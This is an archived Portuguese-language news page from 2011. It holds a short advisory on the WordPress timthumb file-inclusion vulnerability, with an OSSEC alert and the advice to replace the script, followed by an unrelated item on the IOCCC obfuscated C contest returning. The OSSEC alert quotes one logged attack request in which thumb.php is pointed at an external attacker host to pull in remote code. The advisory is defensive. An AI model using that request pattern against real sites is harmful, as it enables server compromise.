você está aqui: Home  → Arquivo de Mensagens

WordPress - Corrigindo vulnerabilidade no timthumb

Colaboração: Alexandro Silva

Data de Publicação: 18 de novembro de 2011

Surgiu uma vulnerabilidade no Wordpress classificada como alta. A falha foi encontrada no script timthumb presente na maioria dos templates e permite a inclusão de arquivos maliciosos.

O Ossec alerta e bloqueia as tentativas de ataque com o objetivo de explorar está vulnerabilidade se a active-response foi habilitada.

  OSSEC HIDS Notification.
  2011 Nov 11 03:29:38
  
  Received From: acme->/var/log/httpd/www.acme.com-access_log
  Rule: 31151 fired (level 10) -> "Mutiple web server 400 error codes from same source ip."
  Portion of the log(s):
  
  xx.xxx.xxx.xxx - - [11/Nov/2011:04:29:25 -0200] "GET //wp-content/themes/Quadro/thumb.php?src=http://picasa.com.xpl.be/yahoo.php
  
  HTTP/1.1" 404 232 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"

Para corrigi-la é necessário executar os seguintes passos:

  1. Localizar se o arquivo timthumb.php, thumb.php ou similar encontra-se no diretório template localizado em wp-content/themes;
  2. Em caso afirmativo substituir todo o código pela nova versão.
Notícia publicada originalmente no blog do autor

Mais informações

markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/


Competição de código C ofuscado retorna depois de 5 anos

Fonte: Notícias Linux

O "International Obfuscated C Code Contest" (IOCCC), Competição Internacional de Código C Ofuscado, retornou e anunciou o início da vigésima competição; a competição estava em hiato, sem resultados publicados para a última competição, que foi realizada em 2006. Agora a competição está de volta e, de 12 de novembro de 2011 até 12 de janeiro de 2012, as inscrições estão abertas para a competição de escrever o mais obscuro ou ofuscado programa em linguagem C que irá ilustrar, perversamente, a importância do estilo de programação, estressar compiladores C com relação a código estranho e demonstrar as sutilezas da linguagem C. Apesar da competição já estar aberta, as submissões online serão aceitas somente a partir de 1o. de dezembro, já que o sistema de submissão está sendo atualizado.



 

 

Veja a relação completa dos artigos de Alexandro Silva

Opinião dos Leitores

Seja o primeiro a comentar este artigo
*Nome:
Email:
Me notifique sobre novos comentários nessa página
Oculte meu email
*Texto:
 
  Para publicar seu comentário, digite o código contido na imagem acima
 


Powered by Scriptsmill Comments Script